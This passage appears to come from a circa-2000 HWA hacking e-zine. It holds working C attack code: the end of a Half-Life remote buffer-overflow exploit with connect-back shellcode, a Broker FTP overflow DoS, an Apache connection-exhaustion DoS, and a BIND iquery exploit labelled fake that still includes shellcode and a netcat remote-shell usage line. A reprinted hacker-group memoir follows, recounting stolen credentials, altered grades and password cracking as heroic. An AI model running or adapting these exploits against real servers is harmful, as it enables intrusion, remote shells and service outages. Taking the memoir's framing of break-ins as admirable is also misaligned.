                    if (FD_ISSET(sock_r, &fd_r)) return sock_r;
                 else
                    return -1;
                 }
             }
         return -1;
      }
      
      
      int
      get_server_info( int sock, u32 addr, u16 port)
      {
         u32 r_addr;
         u16 r_port;
         int n, i;
         u8  pkt[256], *str;
      
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf(&pkt[4], "details");
      
         n = udp_send(sock, addr, port, pkt, strlen(pkt));
         printf(".  connecting to the server...  "); fflush(stdout);
         if (async_read(sock, 6)<0)
             goto server_down;
         n = udp_read(sock, &addr, &port, pkt, sizeof(pkt));
         if (n<0)
              {
      server_down:
              printf("\bserver down!\r*\n");
              exit(0);
              }
         printf("\bdone\n");
         str = &pkt[4];
         str+=strlen(str)+1;
         printf("\t server_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\t    map_name  [%s]\n", str); str+=strlen(str)+1;
         str+=strlen(str)+1;
      
         printf("\t   game_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\tusers_online  [%d of %d]\n", str[0], str[1]); str+=3;
         printf("\t   remote_OS  [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? "linux" : "unknown")));
         if (str[1]=='w') return 2;
         if (str[1]=='l') return 1;
         return 0;
      }
      
      u32 retrieve_local_info(int sock, u8 *host)
      {
         struct sockaddr_in server;
         int    soclen;
         soclen = sizeof(server);
         if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0)
             {
             printf("error in getsockname\n");
             exit(0);
             }
         snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port));
         return htonl(server.sin_addr.s_addr);
      }
      
      int
      bind_tcp( int *port)
      {
         struct sockaddr_in mask_addr;
         int sock, portno=25000; /* base_port */
      
         sock = socket( AF_INET, SOCK_STREAM, 0);
         if (sock<0)
            return sock;
      
      redo:
         mask_addr.sin_family = AF_INET;
         mask_addr.sin_port = htons( portno);
         mask_addr.sin_addr.s_addr = 0;
      
         if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0)
            {
      error:
            portno++;
            if (portno>26000)
               {
               printf("*  no TCP port to bind in.\n");
               exit(0);
               }
            goto redo;
            }
         if (listen( sock, 0)<0)
            goto error;
      
         printf(".  TCP listen port number %d\n", portno);
         *port = portno;
         return sock;
      }
      
      wait_for_connect(int sock)
      {
         fd_set fds;
         u8     tmp[256];
         int    tcp, addr_len;
         struct sockaddr_in server;
      
         printf(".  waiting for connect_back shellcode responde...  ");
         if (async_read(sock, 15)!=sock)
              {
              printf("\bfailed!\r*\n");
              exit(0);
              }
          tcp = accept( sock, (struct sockaddr *)&server, &addr_len);
          printf("\bconnected\n.       ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port));
          close(sock); /* closing incoming socket */
          printf(".  congratulations. you have owned this one.\n");
      
      
          /* basic async mode */
          while (1)
              {
              FD_ZERO(&fds);
              FD_SET(0, &fds);
              FD_SET(tcp, &fds);
      
              if (select(tcp+1, &fds, NULL, NULL, NULL)>0)
                 {
                 if (FD_ISSET(0, &fds))
                    {
                    int n;
                    n = read(0, tmp, 256);
                    if (n<0)
                       goto end_conn;
                    if (write(tcp, tmp, n)!=n) goto end_conn;
                    }
                 if (FD_ISSET(tcp, &fds))
                    {
                    int n;
                    n = read(tcp, tmp, 256);
                    if (n<0)
                       goto end_conn;
      
                    if (write(0, tmp, n)!=n) goto end_conn;
                    }
                 }
              }
      end_conn:
          close(tcp);
          printf(".  bye-bye. Stay tuned for more Tamandua Sekure Labs codes.\n");
      }
      
      assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo)
      {
         u8    pkt[2048],
               *shell_ptr;
         struct sockaddr_in *sc_server;
         u32   ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40;
         int   i, n, tcp, tcp_port;
      
         printf(".  localinfo %s\n", linfo);
         tcp = bind_tcp( &tcp_port);
         sc_server = (struct sockaddr_in *)&shellcode[10];
         sc_server->sin_addr.s_addr = htonl(laddr);
         sc_server->sin_port = htons(tcp_port);
      
         last_byte-=strlen(linfo);
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf( &pkt[4], "rcon ");
         i = strlen(pkt);
         shell_ptr = &pkt[i];
      
         /* find out how many nops we can push before shellcode */
         n = last_byte - i - sizeof(shellcode)-1 - over_head;
         for (i=0;i<n;i++)
             shell_ptr[i] = 0x90; /* nop */
         shell_ptr+=i;
      
         /* fill in the shellcode */
         for (i=0;i<sizeof(shellcode)-1;i++)
             shell_ptr[i] = shellcode[i];
         shell_ptr+=i;
      
         /* fill in the overhead buffer */
         for (i=0;i<over_head;i++)
             shell_ptr[i] = '-';
         shell_ptr+=i;
      
         /* fill return address and ebp */
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
      
         /* finalize string */
         *shell_ptr = 0;
      
         n = udp_send( sock, addr, port, pkt, strlen(pkt));
         printf(".  sending poison code. %d bytes sent\n",n);
         wait_for_connect(tcp);
      }
      
      usage()
      {
         printf("\n.  usage: hl-rcon <server ip[:port]>\n");
         exit(-1);
      }
      
      main(int argc, char **argv)
      {
         u32 addr, laddr;
         u16 port;
      
         int sock, i;
         u8  linfo[256], *tmp = NULL;
      
         printf(".  half-life 3.1.0.x remote buffer-overflow for linux x86\n");
         printf(".  (c)2000, Tamandua Sekure Laboratories\n");
         printf(".  Authors: Thiago Zaninotti & Gustavo Scotti\n");
      
         if (argc<2)
            usage();
      
         tmp = (u8 *)strchr(argv[1], ':');
         if (tmp)
            {
            *tmp = 0; tmp++;
            port = atoi(tmp);
            }
         else
            {
            printf(":  port not found, using default 27015\n");
            port = 27015;
            }
      
         addr = dns2ip(argv[1]);
      
         if (addr==0xffffffff)
            {
            printf("host not found!\n");
            exit(0);
            }
      
         sock = udp_connect( addr, port);
         laddr = retrieve_local_info(sock, linfo);
         if (get_server_info(sock, addr, port)!=1)
            {
            printf("this is not a linux server. Make a shellcode to it and have fun\n");
            exit(0);
            }
         assembly_shell_code(sock, addr, port, laddr, linfo);
      
      }
      
      
      @HWA      
      
      
333.0 [HWA] Release: trans0ft brokerftp vuln by eth0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      Check http://hwa-security.net for more also check 
      http://hwa-security.net/hot.html for new 
      releases.
            
      
      
      
      /**************************************************/
      /*This proof-of-concept DoS was programmed in less*/
      /*than 5 minutes (I was bored), and was programmed*/
      /*from the information taken from USSR Labs white */
      /*paper on TransSoft's Broker FTP Server          */
      /*                                                */
      /*                               eth0 of hwa      */
      /*                    [eth0@hwa-security.net]     */
      /*                    [http://www.hwa-security.net*/
      /**************************************************/
      
      #include <stdio.h>
      #include <strings.h>
      #include <errno.h>
      #include <signal.h>
      #include <sys/syscall.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      
      struct in_addr
      resolv (char *name)
      {
        static struct in_addr in;
        unsigned long l;
        struct hostent *ent;
      
        if ((l = inet_addr (name)) != INADDR_NONE)
          {
            in.s_addr = l;
            return in;
          }
        if (!(ent = gethostbyname (name)))
          {
            in.s_addr = INADDR_NONE;
            return in;
          }
        return *(struct in_addr *) ent->h_addr;
      }
      
      
      main (int argc, char *argv[])
      {
        struct sockaddr_in addr;
        int i, s;
        char c;
        int port = 21;
        printf("Vulnerable systems:    eth0 from HWA
       Broker FTP Server version 3.x
       Broker FTP Server version 4.x
       Immune systems:
       Broker FTP Server version 4.3.0.1 \n");
       
        if (argc < 2)
          {
            printf ("Usage : %s <host> [port]\n", argv[0]);
            exit (0);
          }
        if (argc == 3)
          port = atoi (argv[2]);
        s = socket (AF_INET, SOCK_STREAM, 0);
        addr.sin_family = AF_INET;
        addr.sin_addr = resolv (argv[1]);
        addr.sin_port = htons (port);
        connect (s, (struct sockaddr *) &addr, sizeof (addr));
        write (s, "USER ", 5);
        for (i = 1; i <= 6002; i++)
          {
            write (s, "x", 1);
          }
        write (s, "\n", 1);
      
        read (s, &c, 1);
        printf("Done sending 6002 characters as the username...\n");
      
      }
      
      @HWA            

334.0 [HWA] Release: Grazer releases R2D2 dos
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /* ------------------- R2D2.c ------------------ */
      /*  DIGIT-LABS PRIVATE!!!! DO NOT DISTRIBUTE!!!  */
      /*  Released thru HWA-Security.net by GRAZER     */
      /*                 Oct 21 2000                   */
      /*  grazer@hwa-security.net                      */
      /* ------------------- R2D2.c ------------------ */
      /* This tool will open a lot of connections (TCP)
      *  to the target and port you specify.
      *
      * I have configured it to DoS some of the
      * Apache webservers. There is a little issue in
      * httpd.conf, the MaxClients default value is
      * 150 (RedHat 6.0 / Apache1.3.6), easy to fill up.
      *
      * I have built-in some scriptkiddie protection to 
      * avoid some stupid people will mess with this tool.
      *
      * Thanks to Scrippie for some good ideas and help.
      * Thank to Mixter for help and addition.
      *
      *                    grazer@digit-labs.org
      *                 // grazer@hwa-security.net
      *
      * http://www.digit-labs.org || http://hwa-security.net
      */
      
      
      #include<stdio.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      #include<netdb.h>
      
      char server_lag[] = "GET ////////////////////////////////////////////
      HTTP/1.0\n";
      
      main(int argc, char *argv[])
      {
      
      int MaxClients;
      int Timeout = 15;
      int times_to_connect;
      int sock, i, x, s[MaxClients], port;
      
      struct in_addr addr;
      struct sockaddr_in sin;
      struct hostent *he; 
      
      if (argc<3)
         {
         printf("\nR2D2 Apache Default MaxClients DoS \n");
         printf("usage : %s <victim> <port> <Times>\n",argv[0]);
         printf("Times = Times to reconnect after Timeout \n");
         printf("                         by grazer       \n");   
         exit(0);
           }
      
      times_to_connect = atoi(argv[1]);
      port = atoi(argv[2]);
      
      if ((he=gethostbyname(argv[1])) == NULL)
         {
         printf ("Cannot Lookup Host");
         exit(0);
         }
           
         bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
         sin.sin_family=AF_INET;
         sin.sin_port=htons(port);
           
         MaxClients = 150; /* make this the victims httpd.conf MaxClient 
                              value */                       
      
      for (x=0; x < times_to_connect; x++)
      {
         for (i=0;i<MaxClients;i++)
         {
           s[MaxClients] = socket(AF_INET, SOCK_STREAM, 0);
           sock = connect(s[MaxClients], (struct sockaddr*)&sin, sizeof(sin));
         /*  write(s[MaxClients], server_lag, strlen(server_lag));            */ 
         /* Remove comment pare and set timeout to 1 to enable server-lagging */
         } 
      
      sleep(Timeout);
      }
      }
      
      @HWA      

335.0 [HWA] The Bind P3 exploit revealed.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      For what it is. A phake
      
      THIS DOES NOT WORK IT DOES SHIT, ITS BROKEN AND IS FAKE
      
       /* start fux0ring script kids in 2000                   */
       /* Bogosities: SUSPECTED bogus Bind P3 Sept 2000        */ 
       /* some twit sent me this and a friend blabbed that     */  
       /* i had it so now everyone was bugging me for it i'm   */
       /*  pretty damn sure it is a bogus/rip/fake shellcode   */
       /* and a call to netcat? c'mon. bur grab it and stfu.   */
      
       /* DON'T ask us anything about it i won't respond. 
       /* 
       /* Confirmed hoax/fake code.

       
       /* Posted on HWA-Security.net for above reasons    */
       /* Code is PHAKE                                   */
      
       PRIVATE CODE -- DO NOT DISTRIBUTE -- PRIVATE
       
                  >>> ADM Bind 8.2.2-P3 <<<
      
           ripped/fucked for fbsd
        
           IRCnet
       
                #elitehackerz
       
                          fucks to #!ADM
       
        remote bind 8.2.2 pre3 
        ported to FreeBSD by gunt3r 
      
                  >>> ADM Bind Rip 8.2.2-P3 <<<
      
        PRIVATE CODE -- DO NOT DISTRIBUTE -- PRIVATE
        greets to ADM, stran9er, holg3r
      
        bug in: bind/named/ns_req.c:req_inquery()
      */
      /*
        offsets: 8.0.0     min =  0           options fake-iquery
                 8.2.2-P3  min = -100
                 8.1.1     min =  400         [ fake-iquery yes; ]
      */
      /*
       Usage example:
        $ (./exploit 0 /bin/sh -c 'exec sh -i <&4 >&4 2>&4';cat) | nc localhost 53                                                                             
        Adress: 0xefbfd444 Offset: 0                                                    
        sh: can't access tty; job control turned off                                    
        # whoami
        root
        #
      */
      #define QUERY_LEN 0x600
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <sys/types.h>
      #include <netinet/in.h>
      #include <unistd.h>
      #include <arpa/nameser.h>
      
      typedef struct {
              unsigned short int      r_class;                /* class number */
              unsigned short int      r_type;                 /* type number */
              unsigned long int       r_ttl;                  /* time to live */
              unsigned short int      r_size;                 /* size of data area */
              char    r_data[QUERY_LEN];                      /* pointer to data */
      } rrecord;
      
      char shellc[] = "\xEB\x4b\x5E\x33\xD2\x33\xC9\x33\xDB\x66\x8B\x04\x0E\x02"
      "\xC4\x88\x04\x16\x41\x41\x42\x22\xC0\x75\xF0\x02\xE4\x74\x0E\x8D\x04\x16"
      "\x89\x04\x1E\x43\x43\x43\x43\xEB\xE0\x90\x90\x33\xC0\x89\x04\x1E\x46\x88"
      "\x46\x0E\x46\x46\x46\x89\x46\x06\xB0\x3B\x8D\x4E\x10\x8B\x5E\x10\x8B\xD1"
      "\x8D\x76\x05\x52\x51\x53\x50\xFF\xE6\xE8\xB0\xFF\xFF\xFF\x6f\x21\x6f\x21"
      "\x6f\x21\xdf\x21\x6f\x21\x6f\x21\x6f\x21\xdf\x21\xdf\x21\x8B\x0F\x8B\x0F"
      "\x8B\x0F\xdf\x21\x8B\x0F\x02\x05\x8B\x0F\x6f\x21\x6f\x21\x6f\x21\xdf\x21";
      char neshel1[] = "\x11\x11\x11\x11\x11\x11\x11\x11"; /* shellcode by   */
      char neshel2[] = "\x22\x22\x22\x22\x22\x22\xdf\x21"; /* stran9er 10'97 */
      
      main(int argc, char **argv) {
         HEADER *h;
         rrecord *rr;
         char db[sizeof(HEADER)+sizeof(rrecord)+2];
         char *buf, *ptr;
         unsigned char cat[]="no";
         short int *buflen;
         unsigned long stack = 0xefbfd444, offset;
         int sh=1024,o,b,c,t;
      
         if ( (argc<3) || (*argv[2]!='/')) {
           printf ("usage %s offset /path/command [args ...] | netcat target 53\n",argv[0]);
           exit(1);
         }
         offset=atoi(argv[1]);
         stack+=offset;
         fprintf(stderr,"\nAdress: 0x%x Offset: %d\n",stack, offset);
         buf=db;
         memset(buf, 0, sizeof(db));
         buflen=(short int *)buf;
         *buflen=htons(sizeof(db)-2);
         h = (HEADER *)(buf+2);
         h->id = rand() & 0xfff;
         h->opcode = IQUERY;
         h->ancount = htons(1);
         rr=(rrecord *)((char *)h+sizeof(HEADER)+1);
         rr->r_class= htons(C_IN);
         rr->r_type = htons(T_A);
         rr->r_ttl  = htonl(31337);
         rr->r_size = htons(QUERY_LEN+1);
         ptr=rr->r_data+1;
         memset(ptr,0x90,QUERY_LEN);
         ptr[498]=0xeb; ptr[498+1]=21; /* damn: sprintf(dnbuf, "[%s]", inet_ntoa(data_inaddr((u_char *)data))); */
         for(c=sh;c<=(QUERY_LEN-4);) {
            if ((c+4) > (QUERY_LEN-4)) stack +=4;
            ptr[c++] =  stack & 0x000000ff;
            ptr[c++] = (stack & 0x0000ff00) >> 8;
            ptr[c++] = (stack & 0x00ff0000) >> 16;
            ptr[c++] = (stack & 0xff000000) >> 24;
         }
         strcpy(ptr+sh,shellc);
         for (b=2;b<argc;b++) strcat(ptr,neshel1);
                              strcat(ptr,neshel2);
         for (b=2;b<argc;b++) {
          for (c=0;c<strlen(argv[b]);c++) {
           cat[0]=argv[b][c]-'Z';
           cat[1]='Z';
           if (!cat[0]) break;
           for (t=0,o=-1;t!=o;) {
              o=t;
              if ((cat[0]!=0) && (cat[0]<=32)) { cat[0]++; cat[1]--; t++; }
              if (cat[1]<=32) { cat[0]++; cat[1]--; t++; }
              if   (!cat[0]) {fprintf (stderr,"can't encode command line\n") ; exit(1);}
           }
           strcat(ptr,(char *)cat);
          }
          if ( b != (argc - 1) ) strcat (ptr,"\xf0\x10"); 
         }
        strcat(ptr,"\x80\x80");
        ptr[strlen(ptr)]=9;
      
        write(1,buf,sizeof(db));
      }
      /* DONT FUKIN DIST 0- THAT MEANS YOU DARKN3T SCRIPTK1DS */
      
      @HWA


336.0 [HWA] Darknet.hwa-security.net Mirror opens
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://darknet.hwa-security.net/
      
      Due to lots of hassles with gov-boi's site and his personal problems and dosings
      and legal entanglements and predicaments and fuckups we decded to host a mirror
      on our site. Its up now.
      
      http://darknet.hwa-security.net/
      
      note: if thats broken due to DNS issues this godawful link below will work
      
      http://hwa-security.net/darknet.hwa-security.net/darknet2
      
      Posts will be updated as often as i can, do not bug us if the updates do not come
      regularily, his site is often down and the files are not available. Plus we have
      heavy work loads ourselves.
        
      
      @HWA
      

337.0 [IND] from the didn't they die? files: genocide2600.com oldskewl revisited
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Gencodide2600.com: ex hosts of packetstorm and spikemans dos site, both these
      sites were pulled due to some differences or other and packetstorm was relocated
      to a .edu site, for those that followed the story it was a nasty time the rest
      of you will just recall securify aquiring and hosting packetstorm and Ken retiring
      from hosting the site, this is all very old news, anyway...

      Genocide2600 servers originally hosted packetstorm back when Ken Williams had
      control over it, strangely they seem to again have at least a packetstorm 
      mirror up on their servers (or is that just aliased?) anyway i found this while
      flipping through referrer tags ang dont recall having ever printing the Gen2600
      history file which is quite interesting so here it is:     
            
      
      From davidsol@panix.com Mon Apr 28 15:22:14 1997
      Date: Mon, 21 Apr 1997 14:08:27 -0500
      From: "David S. Bennahum" 
      To: -=* WiZDoM *=- 
      Subject: MEME 3.02
      
      WiZDoM, FYI this is what the current issue of MEME looks like.  I am going 
      to hold sending it to the end of the day, around 4:30 EST, so you can send 
      me any comments, if you have them, otherwise I'll assume this is good to 
      go...
      
      Again, many thanx.
      
      best,
      db
      [...here is the issue as it will look...]
      
      
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      meme: (pron. 'meem') A contagious idea that replicates  like a virus, 
      passed on from mind to mind. Memes function the same way genes and 
      viruses do, propagating through communication networks and face-to-face 
      contact between people.  Root of the word "memetics," a field of study 
      which postulates that the meme is the basic unit of cultural evolution. 
      Examples of memes include melodies, icons, fashion statements and phrases.
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      
      
      MEME 3.02                                       
      http://memex.org/meme3-02.html
      
      
      
      "I was in after school doing make up work in my chem class as usual when I 
      noticed one day my teacher, Miss Ricker, entering grades through  an Apple 
      network using a fairly simple grade program.  She wasn't very  security 
      minded and I used that as a window.  Through a little use of  "Social 
      Engineering" I quick thought something up to ask her and walked  up and 
      started asking her info right when she was entering her login and  
      password into the mac.  I was looking down into my notebook and  pretended 
      to write stuff as I asked her, what I really did was write  down her login 
      and password."
      
              --The cybernetic education of a Hacker, in MEME 3.02
      
      "Hackers."  The word means something different, depending on whom you ask. 
       People at CERT, the Computer Emergency Response Team at Carnegie Mellon 
      University in Pittsburgh (http://www.cert.org/), might say, "a hacker is 
      someone who breaks into computers."  My great-aunt, who recently turned 
      91, associates hackers with people who drive taxis, from the days when a 
      "hack" meant an unpleasant, or distasteful job.  Richard Stallman, founder 
      of the Free Software Foundation, who was interviewed in MEME 2.04 
      (http://memex.org/meme2-04.html),
      calls himself a hacker. To him "hacking" means  developing software in an
      open, collaborative environment, with a strong ethical sense of right and
      wrong.  The New Hacker's Dictionary defines hacker as "someone who enjoys
      exploring the details of programmable systems and how to stretch their
      capabilities, as opposed to most users, who prefer to learn only the
      minimum necessary."  
      (http://murrow.journalism.wisc.edu/jargon/jargon_22.html#TAG831) Hacking,
       hackers, hack-- whatever the form, these words are the Rorschach 
      test of cyberspace: what you think hacker means says as much about you as 
      it does about hackers.  Are hackers good?  Are hackers bad?  It all 
      depends on what definition of hacking you have.
      
      In this issue of MEME, I send you one of the rare, lucid examples of a 
      hacker-memoir from the breaking-into-computers variety of hacker.  The 
      story is written by someone whose nom-de-hack is "Genocide," and is a 
      founder of Genocide2600, a hacker-clan based in Alaska and the Northwest 
      of the United States.  The piece came my way via another hacker, named 
      WiZDoM.  He could well be the same person as Genocide, or not.  That's 
      part of this game-- uncertainty.  
      
      With hackers you can't be sure what's true, and what's not.  Nor does it 
      really matter.  Hacker-tales are meant to be heroic.  They are yarns, and 
      this one's one of the best I've received in a long, long time.  I think 
      you'll enjoy it as well.  A brief cautionary note: those readers who take 
      umbrage at "curse words" should be forewarned, Genocide likes to use them. 
       Spelling is left as received.
      
      I make no moral judgment about this essay, other than to say breaking into 
      computers is bad, and you shouldn't do it.  You, however, may want to 
      discuss the issues raised by Genocide's essay, and you're invited to do so 
      in the MEME discussion area, on Electric Minds:
      
      http://www.minds.com/cgi-bin/EMPane.cgi?c=21&f=0&i=1&t=9
      
      --dsb
      
      
      Date: Fri, 18 Apr 1997 16:42:43 -0800 (AKDT)
      From: -=* WiZDoM *=- 
      To: The_World@universe.com
      Cc: gen2600@aracnet.com
      Subject: Thought you may want to read.
      
      
      
                              The Genocide2600 Group History
      
                              Writtin by Genocide                     4/1/97
      
      
      
              http://www.aracnet.com/~gen2600
              http://www.Genocide2600.com
      
      
      
              /* Some of the contents of this document may be fictional.  I 
              leave the reader to themselves to figure out what is true and not 
              true and what you will believe.  Since it covers possibly illegal 
              topics and events,
      
              I will not swear that any of the following content is true in any 
              way.  All events herein may or may not have happened, for obvious 
              reasons I must leave it up to the reader to choose whether or not 
              anything the read contains even a grain of truth.  As for the members, 
              we all know what really happened. */
      
      ---
      A:      Intro
      
      1.      What a hacker is.  What a hack is.
      2.      Who we are.
      3.      The Genocide2600 Manifesto
      4.      How it started.
      ---
      
              A:      Intro
      
      Well, people have been asking me for about a three years or so, how did
      
      you start the Genocide2600 group...how did you get into hacking, how, how, 
      how, how...etc...Well, I'm going to make a damn good effort to "tell 
      all".  Right now it's April 1st, April Fools day of 1997, I've been a 
      h/p/v/a/c'er for over 8 years now.
      
      Today the Genocide2600 group is over 150people strong and we occupy 
      Alaska, Washington, Oregon and are now expanding into the East coast area.
      
      We have made many friends in our business/field and have tought many 
      people.  
      
              Shout outs go out to:
      
              -Silicon Toad, Bishop, MODul8r, Jester, Tim Wilde, Xer0 Tolerance.
      
      ---
      1.
      
      First let me start by defining what I consider a hack, or a hacker.  
      
      A "Hack":= 
              The act of doing an action when there is no known way to do it.
              The act of doing something that can't be done.
              The act of doing something that is totally against the odds.
      
      A "Hacker":=
              Someone who can overcome, against the odds.
              Someone who can figure a way out of a game that can't be won.
              Someone who teaches others and spreads knowledge when no one 
              wants to hear it.
              Someone who doesn't quit.       
              Those who rise in the face of thier advesaries when they are 
              grossely outnumbered.
      
        You don't have to know how to "Crack a password file to be a hacker"
      
       "Use what you have got, and you will not need what you have not..."
       -Quote from "Around the world in 80 days"      
      
      ---
      2.
      Who we are.
      
              Let me describe what we are and what we do.
      
              We are simply a group of talented people.  Nothing more nothing 
      less.  A group of people from all walks of life, from 14years old to 
      52years old.  Some of the group don't even know what a password file is, 
      hell some of them don't even know how to turn on a computer.  But the 
      point is, everyone specializes in something and they offer thier 
      services to the rest of the group.  We even have lawyers that assist 
      us...should the need arise.  Everyone helps everyone else in whatever 
      they do, however they can offer thier expertise in thier chosen field.  
      Most of the group was chosen by my hand, but now our numbers have grown 
      so large, I have appointed "heads" that manage areas, ie: one head per 
      Alaska, Washington and now the East coast.  Most of our members choose to 
      stay behind the viel, in other words they don't choose to be public thus 
      they are protected and they speak to those of us who are in the open. 
      There are a handfull of us that do choose to be public:
      
              -DoXaVG, BernZ, Astroboy, WiZDoM, Alexu, OvErLoRD and me - Genocide
      
              Some members of the group are long married and have kids, some 
      are single, the point is, we could be your neighbor or your babysitter for 
      all you know.  We could be the kid filling your gas in your car, it 
      doesn't matter, all you really need to know is we are spreading, as fast 
      as knowledge, faster then light, the speed of information.  
      
      The Social Base of the Hacker:
      The Genocide2600 Manifesto.
      
              People generally believe that hackers have a milicious intent as 
      a general rule.  This, pardon my language is a crock of shit and 
      obviously the idea/ramblings of the most generally uninformed people on
      the net, I do admit that "YES" there are those that are out to only
      destroy, and yes this group does occasionally add to that at a very small
      percentage (this will be explained later), but for the most part, we are
      in the persuit of knowledge.  I do not claim to be a 100% law abiding
      person, nor does the group, obviously if you have heard of us, or even
      after reading this you will be shaking your head at this point.
      
              As a whole that we believe in a collective good, we believe that
      people who try to shut out other are people so others can't listen to them
      or people who try to censor our actions/language/activities are the people
      who deserve none of the above.  We cling to our most basic civil rights.
      We also believe in retrobution for what is lost.  
      
              Eye for an eye mentality is spoken here, take back what is yours.  
      
              Bottom line is this, don't fuck with us, we do fuck back.
      
              Trying to turn peoples minds away from truth or trying to hide
      whats REALLY going on is something that is not tollerable no matter
      what and that therein is the true crime, not trying to rip the viel from
      the sheeps eyes.  We're here to show you.  We aren't the criminals that
      need to be put away.  We are the ones you should praise.
      
              People for all time have feared what they did not
      understand...what they did not know.  You don't know us...you don't
      understand us.
      
              Some have labeled us as terrorists, others as criminals.  Ok.
      Sure.  Whatever.  Go ahead take the criminals and terrorists away that
      fight for your rights.  After you have lost the battle because your
      soldiers are gone at your own hand, you'll have no one to blame but
      yourself.
      
              We fight with the greatest tools of all, our intellect and
              courage.
      
      ---
      3.
      How it all started.
      
              I started when I was 14, I had never heard of hacking, phreaking 
      or any of the lot.  People really didn't pay much attention to me and 
      that suited me just fine.  I was able to be more an observer then the 
      person who screwed up and got nailed for something, I would shake my head 
      and learn from how they fell.
      
              I guess I was what you would call now a phreaker then...I heard 
      that funny sound when you put coins into the pay phones... found it 
      curious and I bought a hand recorder for $20.00 and went to town, I 
      called places I didn't even know about, because I could.  Me and my close 
      personal friends dabbled in Blue Boxing once we discovered BBS' on our
      
      brand new 1200baud modems.  I learned telephony from my cousin, the 
      resident criminal in our town.  As I look back now, the first phreaker I 
      ever knew was my cousin.  He tought me the magic of Ma' Bell and how it
      
      could be turned on her.  I understood true telephony and hadn't even seen 
      a computer.  I had met my first hacker.
      
              My phreaking died with the end of the blue box.  I gave up on it 
      when those friends whome I surrounded myself with began to be picked off 
      one by one by the local law.  I decided to survive I had to adapt, I knew 
      what I was doing was generally thought of as criminal.  But I finally 
      found a knowledge that made my mind hunger, made me stay up night after 
      night.  I wanted to learn for the first time in my life.
      
              Although this hunger didn't lead me in the ways of most law 
      abiding talented computer learners, it did teach me how to make it and 
      not loose no matter what pieces of the art of survival.  
      
              I was in after school doing make up work in my chem class as 
      usuall when I noticed one day my teacher, Miss Ricker, entering grades 
      through an Apple network using a fairly simple grade program.  She wasn't 
      very security minded and I used that as a window.  Through a little use of 
      "Social Engineering" I quick thought something up to ask her and walked 
      up and started asking her info right when she was entering her login and 
      password into the mac.  I was looking down into my notebook and 
      pretended to write stuff as I asked her, what I really did was write 
      down her login and password.
              
              If I failed Chemistry, I wouldn't be able to graduate highschool 
      because it was a required class.
      
              Later that day I had a speech class that I did the grades for on 
      the same network on a similar mac.  I came in 10minutes early, just like 
      normal and no one was in there.  I entered her name and password into the 
      computer and accessed the class grades via her saved information in her 
      personal directory on a restricted network hard drive.  I found my name 
      and double clicked on it, there was all my work info, I added extra 
      credit wherever I could.  On a test, I moved it from 63% to a 73%, it was 
      just enough to boost my grade into the low "D" area.  I graduated almost 
      a year later.  Right on time.
      
              My mother was going back to school to get her degree at the local 
      college in Fairbanks Alaska when I really discovered computers.  I used 
      her access (which, yes I got from a yellow sticky) to the local VAX to 
      wet my lips with the taste of the computer age.  I explored and learned for 
      about two to three years there in that simple student VAX lab, then they 
      went to OSF/1 or Digital UNIX as most know it and something happened. 
      
      This was a chance at a virgin system, the system administrator didn't 
      know exactly how to use/manage a actual UNIX system vs. a VAX system. 
      
      Before he had a chance to secure the server to any reasonable 
      level, I had already discovered the unshadowed /etc/passwd file and in a 
      matter of hours had also discovered my first version of crack.  My first 
      successfull run of my now compiled crack was nearly my last.  I was not 
      aware of the system requirements that crack used at that time.  It was a 
      rather extensive resource hog and after I had set crack to run I put it 
      in the background and hit "w" to see what everyone was doing.  The lab 
      was full.  I had about 40 more seconds before it would finally be done 
      with the passwd file when I hit "w" the last time.  I noticed the system 
      admin doing a "w fstbo" I knew what was happening.  He saw I was using 
      crack on the passwd file and he also knew I was only around the corner by 
      looking at my terminal number.  I freaked, foregrounded the processes,
      killed it and ran.
      
              I only looked back after I had completely left the building, 
      there in the computer lab was the system admin talking to a student at my 
      terminal.  My luck those computers were in such high demand.
      
              I loved that taste of adrenaline.  It was also in that room where 
      I would meet Alexu, WiZDoM and Astroboy.  The first members of the 
      Genocide2600 group, they didn't even know it yet, niether did I.
      
              The following year yielded many systems, mostely criminally 
      broken into, but none were damaged other then our initial breakins.  I 
      guess we were also lucky that Fairbanks Alaska was a great region to 
      begin such a spree.  Two military bases, one Army and one AirForce were 
      only a half hour in each direction, three highschools and a huge college 
      with multiple Cray computers.
      
              Contests between us all, then about up to 10, began and we 
      realized we had formed an actual group.  We wrote virii in assembly that 
      would take each other out on the system while eating resources eventually 
      crashing the computer.  If you won, it was your virii left standing.  
      
              One of the guys in the group "Malcom" had knowledge of a 2600 
      magazine and brought up the idea of actually holding a 2600 group meeting 
      on Fridays at 7pm like in the mag.  We all agreed and took turns teaching 
      whomever would care to listen about computer security, telephony, media, 
      cryptography, government whatever was our specialty.  This was my first 
